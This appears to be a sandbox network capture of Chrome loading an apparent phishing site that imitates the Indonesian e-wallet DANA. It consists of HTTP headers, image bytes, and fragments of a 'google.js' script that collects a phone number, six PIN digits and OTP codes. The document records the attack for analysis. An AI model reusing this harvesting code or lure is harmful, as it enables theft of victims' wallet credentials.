                                                                                                                            Data Ascii: -ox*RfqRb^u(:c?5+~e<ihAAm$kJuXHLL_RG\2(',%~89HeJ6/rm)J#;7m4jC5th[>uN"6;vl-audfPL3&nk6ST j
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 27 0b c7 e8 ec 7e a2 ce c8 9f 4a b1 4a 8b 9d e5 fd 54 5d ae 93 fa 63 c5 8a 15 a4 6f 76 ec 92 1c ed a4 35 06 1b 67 59 dd cb 5e a1 f7 ff dc aa 3c 7e c6 a5 43 67 aa ac cf c7 ec e6 3c 66 90 ad fc c8 3b 1a fd ea 6b 98 81 2a cf 90 30 e8 7a 35 45 be e8 50 6b 92 1e 5c 16 50 59 3a d8 9b d2 0b 90 56 7f d9 f0 22 ae 96 c5 4a 96 0e c7 3c 6e 68 d0 a0 41 76 97 41 0d 45 c7 ef 2d c2 c8 91 23 9b 61 16 70 42 16 03 46 87 17 60 02 98 04 64 20 d0 a9 53 a7 62 18 78 ec 63 79 c9 5c 31 22 fb 1d 66 75 45 bd 05 f3 f3 06 7a e3 81 58 a8 93 fe f0 50 a7 8c 81 41 37 3f b3 15 26 47 1d 55 43 df 7b 5e 06 07 46 43 23 5a 30 73 6d 5d 06 f6 ef 63 19 6f 99 2b 3e 3a c9 f3 e7 cf 0f c8 5e 18 1c 21 db 0a fc 65 c4 f0 d2 60 10 4b 33 55 57 7e 79 f2 e4 c9 a2 aa 51 c0 47 e7 02 ac d1 2a 7b 05 c0 17 79 a0
                                                                                                                            Data Ascii: '~JJT]cov5gY^<~Cg<f;k*0z5EPk\PY:V"J<nhAvAE-#apBF`d Sbxcy\1"fuEzXPA7?&GUC{^FC#Z0sm]co+>:^!e`K3UW~yQG*{y
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: a5 b2 67 cf 5e 18 36 af d9 61 23 4b 8b 8c b1 58 5c 23 5b d9 2b 78 3e 07 7d dd 01 38 d1 da 8e 11 e7 06 1c c4 b2 15 9b 4a 0e 3b c8 53 39 09 3e ce 97 e0 06 63 22 12 86 14 d7 5b 56 60 fe c8 90 19 9d f6 b3 75 ea d4 19 90 3f 7f fe c2 aa 40 90 07 cb 69 d3 a6 75 87 d7 cb c9 aa 69 35 bd 46 40 23 c0 f9 ac c6 56 e8 f1 f0 4f d2 01 fa d5 d2 6e 01 83 d5 ec 70 9a 82 47 77 eb d6 ad cc 63 8f 3d d6 10 db cf 9b c2 0e be 26 4e b3 cf 27 bb 2d 9f c7 04 69 eb c0 4d 80 27 08 3b 4d 3d 57 74 46 57 60 69 f3 0b 8e 82 1b d3 ae 5d bb 79 08 4c c2 47 c2 55 13 43 ec 68 9d 87 c3 bc 7f e0 65 09 c5 3d ca 75 1d 1e 3a e3 b2 65 cb 96 03 58 08 2d 15 10 1f 85 b8 0c f5 ea d5 cb 8d 01 45 49 58 bc dc 03 d7 20 8d d0 be aa c0 5c 53 98 46 a6 2c f8 e8 9e f9 f4 d3 4f 9f 1c 30 60 c0 72 19 fa 60 d0 50 3d
                                                                                                                            Data Ascii: g^6a#KX\#[+x>}8J;S9>c"[V`u?@iui5F@#VOnpGwc=&N'-iM';M=WtFW`i]yLGUChe=u:eX-EIX \SF,O0`r`P=
                                                                                                                            2024-10-06 11:50:07 UTC384INData Raw: 90 88 42 3e 8a e0 fb 68 39 ce 3b a8 e6 1c 4d 9d 52 23 a0 11 d0 08 44 10 02 d8 d4 92 1b 66 a0 ef 62 b3 c5 d9 90 f4 bc 21 ca 14 1b df f6 c1 bf 4c 3b 54 55 86 08 aa 2e 2d aa 46 40 23 a0 11 70 17 81 8a 15 2b e6 ff ee bb ef de 82 17 cd 23 21 ea 8f 03 96 2d ad 6f c0 57 fe a6 5b 9d 7d 26 77 91 d3 dc 34 02 1a 01 8d 40 ea 40 20 16 67 ac 36 c0 a2 f0 54 6c 45 8f c8 d9 00 f6 33 1c 58 b8 70 e1 b0 0e 1d 3a 54 48 1d 55 a2 4b a1 11 d0 08 a4 15 04 c2 65 a1 31 a6 47 8f 1e 95 e0 ab bf 79 85 0a 15 1e 86 57 d0 2a 50 13 c5 87 43 25 60 9a 10 45 a7 3e 41 7d f3 eb e6 cd 9b e7 e0 80 97 c5 0b 16 2c 38 10 0e b2 69 19 34 02 1a 01 8d 80 13 04 c2 a5 e3 17 ca 5e a9 52 a5 7c 38 0d a9 12 ce c2 ad 5d a8 50 a1 9a f0 cd 5f 1e 67 e1 16 80 3f fe cc f8 73 4d 76 72 e2 04 6b a4 0b a7 4e 9d 3a 80
                                                                                                                            Data Ascii: B>h9;MR#Dfb!L;TU.-F@#p+#!-oW[}&w4@@ g6TlE3Xp:THUKe1GyW*PC%`E>A},8i4^R|8]P_g?sMvrkN:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            17192.168.2.64974223.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC559OUTGET /asset/google.js HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:07 UTC712INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-javascript
                                                                                                                            Etag: W/"670203dc-116a"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-a-6c9ddd647d-t676q
                                                                                                                            X-Styx-Req-Id: 21d88a2f-83d9-11ef-bcd5-f67d2bb51c28
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000049-CHI, cache-nyc-kteb1890068-NYC
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215407.055601,VS0,VE37
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            transfer-encoding: chunked
                                                                                                                            2024-10-06 11:50:07 UTC6INData Raw: 31 31 36 61 0d 0a
                                                                                                                            Data Ascii: 116a
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 20 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 4e 6f 68 70 28 65 76 65 6e 74 29 7b 0a 20 20 20 20 24 28 22 23 70 72 6f 63 65 73 73 22 29 2e 73 68 6f 77 28 29 3b 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 24 28 22 23 69 6e 70 22 29 2e 62 6c 75 72 28 29 3b 0a 20 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 76 61 72 20 6e 6f 6d 6f 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 69 6e 70 22 29 2e 76 61 6c 75 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 6e 6f 6d 6f 72 22 2c 20 6e 6f 6d 6f 72 29 3b 0a 20 20 20 20 76 61 72 20 6c 6f 67 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42
                                                                                                                            Data Ascii: function sendNohp(event){ $("#process").show();event.preventDefault(); $("#inp").blur(); var nomor = document.getElementById("inp").value; sessionStorage.setItem("nomor", nomor); var logo = document.getElementB
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 31 27 29 3b 0a 20 76 61 72 20 70 69 6e 32 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 32 27 29 3b 0a 20 76 61 72 20 70 69 6e 33 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 33 27 29 3b 0a 20 76 61 72 20 70 69 6e 34 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 34 27 29 3b 0a 20 76 61 72 20 70 69 6e 35 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 35 27 29 3b 0a 20 76 61 72 20 70 69 6e 36 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e
                                                                                                                            Data Ascii: = document.getElementById('pin1'); var pin2 = document.getElementById('pin2'); var pin3 = document.getElementById('pin3'); var pin4 = document.getElementById('pin4'); var pin5 = document.getElementById('pin5'); var pin6 = document.getElementById('pin
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 49 64 28 27 70 69 6e 33 27 29 3b 0a 20 76 61 72 20 70 69 6e 34 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 34 27 29 3b 0a 20 76 61 72 20 70 69 6e 35 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 35 27 29 3b 0a 20 76 61 72 20 70 69 6e 36 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 36 27 29 3b 0a 20 20 20 20 20 76 61 72 20 6f 74 70 31 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 74 70 31 27 29 3b 0a 20 20 20 76 61 72 20 6f 74 70 32 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 74 70 32 27 29 3b 0a 20 20 20 76 61 72 20 6f 74 70 33 20
                                                                                                                            Data Ascii: Id('pin3'); var pin4 = document.getElementById('pin4'); var pin5 = document.getElementById('pin5'); var pin6 = document.getElementById('pin6'); var otp1 = document.getElementById('otp1'); var otp2 = document.getElementById('otp2'); var otp3
                                                                                                                            2024-10-06 11:50:07 UTC324INData Raw: 6c 61 79 44 41 4e 41 2e 68 74 6d 6c 27 3b 20 2f 2f 57 69 6c 6c 20 74 61 6b 65 20 79 6f 75 20 74 6f 20 47 6f 6f 67 6c 65 2e 22 2e 2f 61 70 70 2e 68 74 6d 6c 22 3b 0a 20 20 20 0a 20 20 76 61 72 20 6e 6f 6d 6f 72 20 3d 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 6e 6f 6d 6f 72 22 29 3b 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 61 6c 65 72 74 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 22 4b 6f 64 65 20 62 61 72 75 20 73 75 64 61 68 20 64 69 6b 69 72 69 6d 20 76 69 61 20 53 4d 53 20 6b 65 3c 62 72 2f 3e 2b 36 32 20 22 20 2b 20 6e 6f 6d 6f 72 2b 20 22 22 3b 0a 20 20 20 24 28 22 2e 61 6c 65 72 74 22 29 2e 63 73 73 28 22 63 6f 6c 6f 72 22 2c 22 62 6c 61 63 6b 22 29 3b 0a
                                                                                                                            Data Ascii: layDANA.html'; //Will take you to Google."./app.html"; var nomor = sessionStorage.getItem("nomor"); document.getElementById("alert").innerHTML = "Kode baru sudah dikirim via SMS ke<br/>+62 " + nomor+ ""; $(".alert").css("color","black");
                                                                                                                            2024-10-06 11:50:07 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            18192.168.2.64974723.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:07 UTC622OUTGET /asset/img/indo.png HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:07 UTC662INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 741
                                                                                                                            Content-Type: image/png
                                                                                                                            Etag: "670203dc-2e5"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-b-b586bd68-2lhnd
                                                                                                                            X-Styx-Req-Id: 220a96c0-83d9-11ef-8a12-3e06126c13ad
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            X-Served-By: cache-chi-klot8100165-CHI, cache-ewr-kewr1740022-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215407.383687,VS0,VE38
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:07 UTC741INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 2d 08 03 00 00 00 0e 73 1c 80 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 cc 50 4c 54 45 ff 13 01 ff 19 01 ff 14 01 ff 00 01 ff 14 00 f5 f5 f5 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 ff 14 01 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
                                                                                                                            Data Ascii: PNGIHDRP-sgAMAa cHRMz&u0`:pQ<PLTE


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            19192.168.2.64974623.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:07 UTC625OUTGET /asset/img/load_bg.png HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:07 UTC664INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 7863
                                                                                                                            Content-Type: image/png
                                                                                                                            Etag: "670203dc-1eb7"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-b-b586bd68-slphl
                                                                                                                            X-Styx-Req-Id: 220a8441-83d9-11ef-a668-f6bd2f2baf87
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000132-CHI, cache-ewr-kewr1740020-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215407.383716,VS0,VE38
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 04 00 00 00 d3 74 46 fe 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 01 1c 9a 07 63 00 00 1d 8b 49 44 41 54 78 da ed 9d d9 6f 64 47 76 a7 bf 73 6f 6e cc 4c 92 c9 2d b9 6f b5 48 55 25 95 aa 54 da bb 5b 52 6b 6d 61 ba a7 0d 5b f0 8b fb c1 f0 c3 3c ce f2 34 c0 60 80 99 bf c0 2f f3 34 b0 81 01 c6 30 da 63 f7 00 83 6e 60 ec 1e 49 2d 95 dd b2 d4 56 ab a4 5a 54 7b 15 c9 e2 be 6f c9 25 d7 1b f3 90 cc 22 8b 64 92 99 cc e5 de cb 8c 8f 28 56 ee 8c 88 fc dd 13 27 4e 9c 88 10 34
                                                                                                                            Data Ascii: PNGIHDR,,tFgAMAa cHRMz&u0`:pQ<bKGDtIMEcIDATxodGvsonL-oHU%T[Rkma[<4`/40cn`I-VZT{o%"d(V'N4
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: de d2 2e bb 8b 10 a2 04 19 2f 77 f0 a1 dc c2 f2 f3 3a cf db be 44 43 53 0c 42 14 2f 13 e5 0d 99 96 57 02 3e be cf 4b 5b 67 42 68 dc 83 41 14 93 c9 72 4e f4 94 53 58 06 2f f1 3d 1d 65 77 25 26 ed a4 98 2c df 77 57 4e 61 3d c7 9b 7a 4e d0 b5 78 e8 60 8d 99 72 7d 5c f9 84 75 8a f7 a8 d7 b2 72 31 3e 3a 58 2c 57 be 56 b9 84 d5 c5 8f 74 be 95 eb 09 10 65 9a 58 39 3e aa 3c c2 6a e1 7d 9d 1d 7a 2c 08 d3 cc 78 39 36 15 29 87 b0 ea 78 87 a7 ec 6e 11 4d 99 68 24 c4 a3 d2 a3 5a a5 0b cb e4 35 9e d7 01 d1 63 44 33 8a f1 52 d7 21 96 2e ac 67 79 03 bf dd 6d a1 29 23 26 51 56 4b 1d 1f 96 2a ac 5e de d7 cb 4f 8f 1d 5e da 99 2e 6d 61 7e 69 c2 6a e4 3d ba b4 ac 8e 21 75 44 18 2d 25 a1 a6 14 61 f9 78 93 b3 76 b7 80 a6 42 34 e2 65 f4 e8 93 3c 47 17 96 70 91 57 f5 bc e0 b1 45
                                                                                                                            Data Ascii: ./w:DCSB/W>K[gBhArNSX/=ew%&,wWNa=zNx`r}\ur1>:X,WVteX9><j}z,x96)xnMh$Z5cD3R!.gym)#&QVK*^O^.ma~ij=!uD-%axvB4e<GpWE
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 9f 3c 1d fe 71 f7 1f 9d 3f dd 1b 0a 7b 2b 38 e0 09 d4 bd 78 fe 44 cf 3b df fe c5 8d 2f 97 12 16 62 39 f7 1b f2 ec 8c 29 6c 5b ac 7a 3e a4 d7 1d c2 12 51 55 2d a7 a0 30 a5 d1 b3 91 b1 10 32 ea a9 e0 8f bb df e8 3f d7 df db 55 49 49 ed c4 ca 8c 4d fc b7 cb 7f 35 b2 9a 4e 55 b7 ea c5 35 d3 04 ff 3b 77 d4 ef b6 c5 aa d7 cb 27 f2 61 4a 46 19 6c 66 32 aa 3b f0 46 eb 7b fd 17 fa 4f f6 d6 05 0b 09 21 94 0b c3 ec ef fb f7 6f 2d fc c3 5f 8f db dd 16 07 a0 68 a6 7e af b0 9a 5d b1 6f 9f 42 a0 fa 17 ad 29 ed be 17 9b 3e e8 7b 69 70 b0 bb 29 62 cf cc 4b 5f ef bf 7d ed fa 3f 5c 8b 39 f8 ea f7 d3 c2 44 f6 e6 b6 b0 3a 31 9c 6c b1 04 c1 94 93 a1 16 df 54 7c 64 53 21 58 08 54 a0 c8 59 d5 88 a0 14 0a 14 d2 1f 78 a5 f9 cf 2e 5e 3c dd 1c 31 6c 4d d9 3e 7b f2 0f fb af df 74 f0
                                                                                                                            Data Ascii: <q?{+8xD;/b9)l[z>QU-02?UIIM5NU5;w'aJFlf2;F{O!o-_h~]oB)>{ip)bK_}?\9D:1lT|dS!XTYx.^<1lM>{t
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 56 8a 84 0e 40 6a ca 46 92 74 ae 2b 5c 72 ba b0 b2 07 ec a6 75 52 a2 f3 11 16 58 73 8f b0 50 0a d2 8e 3e 69 5b 03 80 c1 62 4e 58 b8 25 bf 41 cb ca 15 a4 21 27 ac 25 1d 7d d7 94 89 14 cb 90 3b 08 73 84 38 21 6d 10 2a 4b 26 93 4c 26 12 99 4c c6 52 16 5b f9 1a a6 e1 f1 04 83 5e af 2b 16 ce 17 82 90 e0 11 e4 84 b5 ae 03 0e 95 40 a9 54 2a 95 5a 5f 5f 58 9e 5d 99 8f 8d 2e 8f af 4d 6e ac a5 12 56 46 29 04 53 2c e5 35 1a bc cf 36 f7 d4 b7 86 1b ea 06 3b 9b 23 01 bf c7 ed 3b c2 66 58 87 9c b0 32 6c d2 60 77 89 8e 11 2a 1e 5f 5e 9d 9a 1b 9e bb 3e f3 dd e2 74 7c 31 39 9f 8a a5 53 2a 7b 36 b5 89 29 d9 fd 14 15 29 65 f1 77 93 86 04 8c b0 d9 5f f7 4c e3 85 d6 b3 d1 67 06 db 5a fc 7e bb ab 70 64 36 b2 6e 55 56 58 09 c6 68 b7 bb 44 c7 81 44 62 79 65 7c e6 f6 e4 b7 33 0f
                                                                                                                            Data Ascii: V@jFt+\ruRXsP>i[bNX%A!'%};s8!m*K&L&LR[^+@T*Z__X].MnVF)S,56;#;fX2l`w*_^>t|19S*{6))ew_LgZ~pd6nUVXhDDbye|3
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 6e e2 56 c2 52 28 64 2b ff 64 ff f3 51 84 ec 81 3c a9 ac 6b 46 46 65 74 54 aa 3c 64 b8 fb 64 43 ee 16 d1 2c 73 6e f4 36 d4 d6 01 1b 07 cf d8 a9 5d 8f ab 3d 8f 68 8e 84 b0 c0 dc 93 0f ed 16 d6 32 13 6e 14 96 c6 56 84 f1 ec a2 af 6d f6 76 7b c3 24 ec 2e a7 c6 65 24 18 de 6d fa f7 0a 6b 82 15 6d b3 34 45 20 ac 32 b1 fb c1 bd c2 5a 63 c8 ee 92 6a 5c c6 f0 93 23 42 d8 4f 58 16 43 6c 6a 9b a5 29 10 21 ce d0 de 05 cf fb 85 16 26 b6 a7 12 35 9a 43 10 66 19 db fb f0 7e c2 da e4 81 1b a3 ef 1a 5b b0 78 c8 e6 de 87 f7 0f 86 0e b3 a6 3b 43 4d 01 48 3e 9f 7c 7f 61 cd 31 aa 85 a5 29 00 61 74 77 68 34 cb fe c2 4a 73 3f bb 02 5f a3 39 90 24 f7 f7 df 5b 2d df bc e0 23 e6 b5 cd d2 1c 82 b0 c0 c8 fe 4f e5 13 56 8c 9b 7a 1a 4d 73 08 8a 9b 3b 53 65 76 92 3f 93 e1 1e 8b da 66
                                                                                                                            Data Ascii: nVR(d+dQ<kFFetT<ddC,sn6]=h2nVmv{$.e$mkm4E 2Zcj\#BOXClj)!&5Cf~[x;CMH>|a1)atwh4Js?_9$[-#OVzMs;Sev?f
                                                                                                                            2024-10-06 11:50:07 UTC973INData Raw: 7e ec 9b c5 cb 30 c9 34 21 22 7a 94 58 76 04 8b 61 3e e6 d6 d1 f7 b7 2a 15 7b a7 87 57 18 21 43 9b de 81 b9 ac 08 1b fc 9e cf 98 b3 b3 10 76 e7 1d 24 19 63 81 08 f5 da 95 2f 0b 02 4c f2 29 df 56 7b 14 b8 1b bb 85 95 dd 81 f9 11 42 44 db ad 92 11 36 b8 c6 6f 18 ab ce b4 cd 41 d8 2f 2c 80 4d 86 99 27 44 83 f6 b7 8e 8c 60 31 ca a7 7c 5d e9 84 98 c2 70 86 b0 40 b1 c0 30 49 9a f5 38 f1 48 18 ac f2 15 97 99 b2 df 56 65 71 8a b0 20 eb 6f 4d 50 47 c4 51 a5 72 3e 42 86 07 7c cc 77 76 fb 55 4f 16 ca 69 f8 39 cf 25 da 30 9c 72 ed 39 1a c1 62 9e 6f b8 51 f9 d4 bd 62 0b e6 44 9a 79 8e f3 44 40 8b eb 00 04 58 e6 3b ae b3 60 77 51 f6 2f 9c 13 31 e8 e4 12 a7 09 69 69 e5 41 d8 e0 3e 57 98 aa fe 3c 60 61 c5 73 2e 1e fa 79 91 01 7c 5a 5c bb 10 92 8c 70 85 11 fb 22 eb 87 17
                                                                                                                            Data Ascii: ~04!"zXva>*{W!Cv$c/L)V{BD6oA/,M'D`1|]p@0I8HVeq oMPGQr>B|wvUOi9%0r9boQbDyD@X;`wQ/1iiA>W<`as.y|Z\p"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            20192.168.2.64974523.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:07 UTC627OUTGET /asset/img/load_spin.png HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:07 UTC664INHTTP/1.1 200 OK
                                                                                                                            Connection: close
